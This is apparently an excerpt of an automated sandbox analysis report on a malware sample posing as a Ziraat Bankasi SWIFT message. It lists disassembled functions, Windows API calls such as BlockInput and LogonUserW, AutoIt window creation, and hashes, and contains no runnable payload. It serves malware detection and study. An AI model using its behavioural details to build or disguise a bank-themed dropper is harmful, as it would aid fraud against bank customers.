Opcode Fuzzy Hash: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
Instruction Fuzzy Hash: 89E0BF71000511AFEB252F54FC05DB77BE9EB04320711C529B59981871DB625C90AB50

Function 000A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000A6DB3,-0000031A,?,?,00000001), ref: 000A81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000A81BA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
Instruction ID: 684153c2a5f497eedbaccde46d546351dda4dde0bba9572b153a1b63fc106902
Opcode Fuzzy Hash: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
Instruction Fuzzy Hash: 0FB092B1044608ABDB002BE1FC0AB587F68FB08652F004010F64D488618BB254908A92

Function 00093B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00094176

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 659ca0f5d19a930d04a0e02c33a5d313d5485356da9f41b40e586f6145f9c7de
Instruction ID: bfe3db54d5d0fd55ce428daf3d8714d863ab40d77f45336b9b0e961e9dc7ebda
Opcode Fuzzy Hash: 659ca0f5d19a930d04a0e02c33a5d313d5485356da9f41b40e586f6145f9c7de
Instruction Fuzzy Hash: DA728C74E042099BCF24DF94C491EBEB7B5FF48300F14806AE919AB292D771AE45EB91

Function 000AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
Instruction ID: e521fee8e160b0960b334302af2041a542d41809ad3ae42fc996fe01e9489f4e
Opcode Fuzzy Hash: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
Instruction Fuzzy Hash: 7E320322D29F014DD7679634D92233AA299AFB73D4F15D727E81AB5DAAEF38C4C34100

Function 000896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: aa326f502fbc2c8d378413fe18ffe2d6185b3d73351685f5c81134b0a94858c9
Instruction ID: 03076911e19319465a6c679be34300797d9ab1688beadbf16afc01427f3afb5c
Opcode Fuzzy Hash: aa326f502fbc2c8d378413fe18ffe2d6185b3d73351685f5c81134b0a94858c9
Instruction Fuzzy Hash: DF2275716083059FD724EF24C891BAFB7E4BF84310F14492DF99A9B292DB71E944DB82

Function 000B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
Instruction ID: 794cf5d6216faa8d63e04cf173aad1186727493aba2f3794920b4aacab0de259
Opcode Fuzzy Hash: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
Instruction Fuzzy Hash: C1B1DF20D2AF518DD32396798931336B65DAFFB2D5B91D71BFC2A74D22EB2185C34180

Function 000CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 000CB6DF

Part of subcall function 000A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,000CBDC3,00000000,?,?,?,?,000CBF70,00000000,?), ref: 000A3453
Part of subcall function 000A344A: __aulldiv.LIBCMT ref: 000A3473

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
Instruction ID: dc2cd68d2c53ffd86065f0b7ec943c73894531a08cde661421aa3d380c595186
Opcode Fuzzy Hash: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
Instruction Fuzzy Hash: 6C21DF766345108BC729CF28C881B96B7E0EB95310B248E6CE4E5CB2D0CB38BA45CB54

Function 000D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 000D6ACA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
Instruction ID: 327dfea28ba216b76649542f7a49b62e65267facf7e2f3511029764572075ce2
Opcode Fuzzy Hash: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
Instruction Fuzzy Hash: 8FE01A3A200204AFC740EBA9D80499AB7ECAFB8751F058427E985D7391DAB1E8449BA1

Function 000C74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000C74DE

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 13fea7f4ced5b6f4c4f08cb15c7012e387b3f9d6cb24608e2a64a882f245d211
Instruction ID: 29a6a2673a8f6f82a0784ea2940939863bafc53d87ccc9e729711f0a0b06265c
Opcode Fuzzy Hash: 13fea7f4ced5b6f4c4f08cb15c7012e387b3f9d6cb24608e2a64a882f245d211
Instruction Fuzzy Hash: 53D05EA012C30538EC7D0724DC0FF7E0948F3107C1F80818DB58AC94C2BAC058459832

Function 000BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000BAD3E), ref: 000BB124

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
Instruction ID: 055750e413a0190fc865d7da9952dc2ae4d1c9eb7b6527b81cdc3031b4c013ed
Opcode Fuzzy Hash: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
Instruction Fuzzy Hash: D4D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408110FA15C50A0C671D531AB50

Function 000A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 000A818F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
Instruction ID: 0b74dae6d05fc59afbec53bb508ddd155c62ea851152eacc41895cb42d876645
Opcode Fuzzy Hash: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
Instruction Fuzzy Hash: 94A0223000030CFBCF002FC2FC0A8883F2CFB002A0B000020F80C08830CBB3A8A08AC2

Function 0008E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73c9f38a445beaac03339ea57b0e4bffccf49f6ec81eb59f8cf27fba3caef0a
Instruction ID: 458dc1d410e6887e5ab0bab12c2a26e39f727a74f4cb4f4b733bda3d265cacd8
Opcode Fuzzy Hash: a73c9f38a445beaac03339ea57b0e4bffccf49f6ec81eb59f8cf27fba3caef0a
Instruction Fuzzy Hash: 6B22C070A0424ACFDB64EF58C480ABEB7F0FF14314F148069E99A9B352E735AD81DB91

Function 000893F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
Instruction ID: 0b0614ca7e2ad32f2b261e9057020a5611a2f3aa5267a81f883bbc4b3892ea77
Opcode Fuzzy Hash: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
Instruction Fuzzy Hash: 84127970A00609ABDF14EFA4D985AFEB7F5FF48300F148529E846E7651EB36AD20DB50

Function 0008AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
Instruction ID: 1e85824fb2ad3c8c11b73b414cb2e5a40c1ba5ab19256afa9a5cef8325f9973d
Opcode Fuzzy Hash: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
Instruction Fuzzy Hash: 6802C070A00209DBCF14EF68D981ABEBBF5FF44300F108069E946DB296EB35DA11DB91

Function 000A02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: ebf3ee9f3efa05828d28598af8b52ebc6441acfa97a721e45383a00846bec41e
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 5BC1B2322051A70ADFAD467AC47453EFAE15BA3BB531A076DD8B3CB4D5EF20C524E620

Function 000A06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 6c6e10a3284589984336f536da49f9101625a1850fe55b6015156a9dc336fa96
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: DDC1A0322091970AEFAD467AC43453EBAE15BA3BB131A076DD4B3CB4D5EF20D524E620

Function 0009FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 210e185b9782a8ac592dfa8e839a071ec9e0034c88333d32d32b1eec66618c09
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 66C191322051970ADFAD863AC43453EBAE15FA2BB171A077DD4B3CB5E5EF20C564E620

Function 0009FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ec6d63e2590df344e8ddf0b236a938d19c5e639f97e8e5d3ebab60ae1a970a7b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E5C1903220909309DFAD463AC47443EBBE15BA2BB531A077DD8B3CB5E5EF20D564E620

Function 00E43080 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 9a87fadf9ff319f0e7ea98e1b7d0c6a00fa2322d0c0b93bc08c533f74a7d95d3
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: DB41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 00E42F70 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 7af8dd37069703745a74987788f45097a1f1e5240bd8d707294ab170cb54b0b5
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 4F019278A00109EFCB44DF98D5909AEF7F6FB48310FA08599E909A7741D730AE41DB80

Function 00E42F10 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 42a9274b1c9b62c4b189c22b0f19f52449f8ac7bcff44644cc086db62972b5bf
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: BE01A478A00109EFCB44DF98D5909AEF7F5FF48314FA08599E919A7341D730AE42DB80

Function 00E418D0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 000DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000DA2FE
DeleteObject.GDI32(00000000), ref: 000DA310
DestroyWindow.USER32 ref: 000DA31E
GetDesktopWindow.USER32 ref: 000DA338
GetWindowRect.USER32(00000000), ref: 000DA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000DA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000DA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA4D8
GetClientRect.USER32(00000000,?), ref: 000DA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000DA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA55E
GlobalLock.KERNEL32(00000000), ref: 000DA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA576
GlobalUnlock.KERNEL32(00000000), ref: 000DA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA586
GlobalFree.KERNEL32(00000000), ref: 000DA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0010D9BC,00000000), ref: 000DA5B9
GlobalFree.KERNEL32(00000000), ref: 000DA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000DA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000DA60E
